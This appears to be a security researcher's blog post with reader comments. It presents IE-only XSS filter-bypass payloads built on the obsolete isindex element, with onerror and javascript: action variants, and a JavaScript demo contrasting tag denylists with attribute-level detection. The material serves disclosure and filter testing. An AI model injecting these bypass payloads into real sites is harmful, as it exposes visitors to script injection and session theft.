New XSS vector

Yes, an XSS post again. I’m sorry 🙂

I’ve been having fun testing some really good filters (some of the best in the business IMO). I found a vector that isn’t on rsnake’s cheat sheet. Check it out:-

Only works on IE

<isindex type=image src=1 onerror=alert(1)>

Because IE treats the isindex element (a very old HTML element) as an input tag, you can give it the same attributes and execute JavaScript: with type=image it behaves like an image input, so the src is fetched, fails to load, and the onerror handler fires.

Update…

Found another variation which is pretty cool:-

<isindex action=javascript:alert(1) type=image>
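To make the filter point concrete, here is an added example of mine (not code from the original post) that you can run with node. It contrasts two filtering strategies against the two vectors above: a tag-name denylist, which is how a filter that "knows" about input and img but has never heard of isindex ends up passing the payload, and an attribute-level check that ignores the element name and looks for on* handlers and javascript: URLs, which is where the script actually lives. The denylist contents, the benign sample and the plain input variant are constructed for the demonstration; the regexes are deliberately minimal and only handle the well-formed markup shown here, not browser-grade HTML.

```javascript
// Added example, not code from the original post. A minimal tag/attribute
// scanner used to contrast two filtering strategies against the isindex
// vectors above. The regexes only cover the well-formed markup shown here;
// they are not a browser-grade HTML parser.

const TAG_RE = /<([a-zA-Z][^\s>\/]*)([^>]*)>/g;
const ATTR_RE = /([^\s=\/>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]*)))?/g;

// Break markup into { name, attrs } records, lower-casing names so that
// ISINDEX / IsIndex compare equal to isindex.
function parseTags(html) {
  const tags = [];
  for (const m of html.matchAll(TAG_RE)) {
    const attrs = {};
    for (const a of m[2].matchAll(ATTR_RE)) {
      // Quoted, unquoted and empty values all come through as strings.
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? '';
    }
    tags.push({ name: m[1].toLowerCase(), attrs });
  }
  return tags;
}

// Strategy 1: a tag-name denylist (constructed list, standing in for any
// filter that reasons about element names). It knows <input> and <img>
// but has never heard of <isindex>.
const DENIED_TAGS = new Set(['script', 'img', 'input', 'iframe', 'object', 'embed', 'form']);

function denylistBlocks(html) {
  return parseTags(html).some(t => DENIED_TAGS.has(t.name));
}

// Strategy 2: ignore the tag name and inspect the attributes, which is where
// the script lives in both vectors: an on* handler, or a URL-bearing
// attribute whose scheme is javascript: (or vbscript: on IE).
const URL_ATTRS = new Set(['src', 'href', 'action', 'formaction', 'data']);

function isScriptUrl(value) {
  // Browsers have historically tolerated whitespace and control characters
  // inside the scheme, so strip them before comparing.
  const scheme = value.replace(/[\u0000-\u0020]/g, '').toLowerCase();
  return scheme.startsWith('javascript:') || scheme.startsWith('vbscript:');
}

// Returns "tag@attribute" for every dangerous attribute found. Any attribute
// starting with "on" is treated as a handler; that is conservative on purpose.
function findDangerousAttributes(html) {
  const findings = [];
  for (const tag of parseTags(html)) {
    for (const [name, value] of Object.entries(tag.attrs)) {
      if (name.startsWith('on') || (URL_ATTRS.has(name) && isScriptUrl(value))) {
        findings.push(`${tag.name}@${name}`);
      }
    }
  }
  return findings;
}

function attributeCheckBlocks(html) {
  return findDangerousAttributes(html).length > 0;
}

// The two vectors from this post, plus two constructed inputs for contrast.
const SAMPLES = {
  isindexOnerror: '<isindex type=image src=1 onerror=alert(1)>',
  isindexAction:  '<isindex action=javascript:alert(1) type=image>',
  inputOnerror:   '<input type=image src=1 onerror=alert(1)>', // constructed: same payload, known tag
  benign:         '<p class="note">hello</p>',                 // constructed
};

// One line per sample: what each strategy decides.
function report() {
  return Object.entries(SAMPLES).map(([label, html]) =>
    `${label.padEnd(15)} denylist=${denylistBlocks(html)} attributes=${JSON.stringify(findDangerousAttributes(html))}`);
}

console.log(report().join('\n'));
```

The denylist passes both isindex vectors while catching the otherwise identical input tag, and the attribute check catches all three, which is also why the vector is only "new" to element-aware filters: the event handler and the javascript: scheme are old news, the element is the novelty.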

8 Responses to “New XSS vector”

  1. x-tense writes:

    You can remove the value of src attribute:

    <isindex type=image onerror=alert(1) src=>

    (only tested on IE6)

    Did you ask rsnake to add this vector?

  2. Gareth Heyes writes:

    Also works in IE8

    I’ll email him

  3. Gareth Heyes writes:

    Emailed rsnake but they won’t be added to the cheat sheet because there is no new event handler and javascript: is already mentioned

  4. superhei writes:

    Hi Gareth Heyes,

    Good job.
    It works in IE6/7/8.

  5. Jim Manico writes:

    If only everyone had the power of

    ESAPI.encoder().encodeForHTMLAttribute(String userData);

    Great find, good job!

  6. Gareth Heyes writes:

    @jim

    Hey Jim, thanks. Why don’t you put up an online demo of ESAPI like Mario’s smoketest? Then we’ll see how good it is 🙂

  7. naughty.spanky.boy writes:

    Hi,

    I have an idea for protecting websites against XSS attacks. Why not ban all tags and allow only predefined ones with ‘special’ care? Like, allow img only with a src that starts with http://, or allow a href only if http or https is found.

  8. Милан writes:

    Also works in IE8. thx